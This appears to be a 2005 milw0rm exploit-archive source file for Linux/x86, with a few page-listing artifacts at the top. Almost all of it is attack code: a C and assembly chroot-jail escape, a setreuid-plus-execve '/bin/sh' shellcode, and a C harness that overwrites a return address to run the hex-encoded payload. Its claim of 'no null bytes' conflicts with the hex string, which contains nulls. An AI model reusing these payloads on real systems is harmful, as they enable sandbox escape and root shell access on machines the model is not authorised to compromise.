148 lines
No EOL
3.3 KiB
C
148 lines
No EOL
3.3 KiB
C
/*
|
|
Linux/x86 chroot and standart shellcode.
|
|
By Okti (http://okti.nm.ru)
|
|
|
|
----------------------------------------------------------------------------------------------
|
|
*/
|
|
|
|
/* Mkdir and Chroot are written in C: */
|
|
|
|
#include<stdio.h>
|
|
#include<unistd.h>
|
|
#include<sys/types.h>
|
|
#include<sys/stat.h>
|
|
int main(void) {
|
|
|
|
mkdir("sh", 0);
|
|
chown("sh", 0, 0);
|
|
chmod("sh", S_IRUSR | S_IWUSR);
|
|
chroot("sh");
|
|
/* But many '../' as possible, i'm to lazy to add comments ;) */
|
|
chroot("../../../../../../../../../../../../../../../../../../../../../../../../");
|
|
}
|
|
|
|
----------------------------------------------------------------------------------------------
|
|
|
|
Asm version of the above C code:
|
|
|
|
----------------------------------------------------------------------------------------------
|
|
|
|
.file "y.c"
|
|
.section .rodata
|
|
.LC0:
|
|
.string "sh"
|
|
.align 4
|
|
.LC1:
|
|
.string "../../../../../../../../../../../../../../../../../../../../"
|
|
.text
|
|
.globl main
|
|
.type main, @function
|
|
main:
|
|
pushl %ebp
|
|
movl %esp, %ebp
|
|
subl $8, %esp
|
|
andl $-16, %esp
|
|
movl $0, %eax
|
|
addl $15, %eax
|
|
addl $15, %eax
|
|
shrl $4, %eax
|
|
sall $4, %eax
|
|
subl %eax, %esp
|
|
subl $8, %esp
|
|
pushl $0
|
|
pushl $.LC0
|
|
call mkdir
|
|
addl $16, %esp
|
|
subl $4, %esp
|
|
pushl $0
|
|
pushl $0
|
|
pushl $.LC0
|
|
call chown
|
|
addl $16, %esp
|
|
subl $8, %esp
|
|
pushl $384
|
|
pushl $.LC0
|
|
call chmod
|
|
addl $16, %esp
|
|
subl $12, %esp
|
|
pushl $.LC0
|
|
call chroot
|
|
addl $16, %esp
|
|
subl $12, %esp
|
|
pushl $.LC1
|
|
call chroot
|
|
addl $16, %esp
|
|
leave
|
|
ret
|
|
.size main, .-main
|
|
.section .note.GNU-stack,"",@progbits
|
|
.ident "GCC: (GNU) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)"
|
|
|
|
------------------------------------------------------------------------------------------------
|
|
|
|
Standart setreuid and execve shellcode (66 bytes).
|
|
It is all clean and tidy, uses 'pop' and 'push', to get string '/bin/sh' from data segment,
|
|
no null bytes.
|
|
For details, compile this asm code with: nasm -f elf shell.asm then ld shell.o and ./a.out
|
|
|
|
------------------------------------------------------------------------------------------------
|
|
|
|
section .data
|
|
|
|
db '/bin/sh'
|
|
global _start
|
|
|
|
_start:
|
|
|
|
; setruid(uid_t ruid, uid_t euid)
|
|
|
|
xor eax, eax
|
|
mov al, 70
|
|
xor ebx, ebx
|
|
xor ecx, ecx
|
|
int 0x80
|
|
|
|
jmp two
|
|
one:
|
|
pop ebx
|
|
|
|
; execve(const char *filename, char *const argv[], char *const envp[])
|
|
|
|
xor eax, eax
|
|
mov [ebx+7], al
|
|
mov [ebx+8], ebx
|
|
mov [ebx+12], eax
|
|
mov al, 11
|
|
lea ecx, [ebx+8]
|
|
lea edx, [ebx+12]
|
|
int 0x80
|
|
|
|
two:
|
|
call one
|
|
db '/bin/sh'
|
|
|
|
---------------------------------------------------------------------------------------------------
|
|
|
|
Hex opcodes of the mkdir chroot and above shellcode asm instructions (in C).
|
|
|
|
---------------------------------------------------------------------------------------------------
|
|
|
|
#include<stdio.h>
|
|
#include<stdlib.h>
|
|
int main() {
|
|
|
|
int *ret;
|
|
long offset = 4;
|
|
char star[] =
|
|
"\x89\xda\x8b\x4c\x24\x08\x8b\x5c\x24\x04\xb8\x27\x00\x00\x00\xcd\x80"
|
|
"\x89\xda\x8b\x5c\x24\x04\xb8\x3d\x00\x00\x00\xcd\x80"
|
|
"\x2f\x62\x69\x6e\x2f\x73\x68\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd"
|
|
"\x80\xe9\x16\x00\x00\x00\x5b\x31\xc0\x88\x43\x07\x89\x58\x08\x89"
|
|
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff"
|
|
"\xff\x2f\x62\x69\x6e\x2f\x73\x68";
|
|
|
|
*((int * ) &ret + offset) = (int) star;
|
|
}
|
|
|
|
|
|
// milw0rm.com [2005-07-11]
|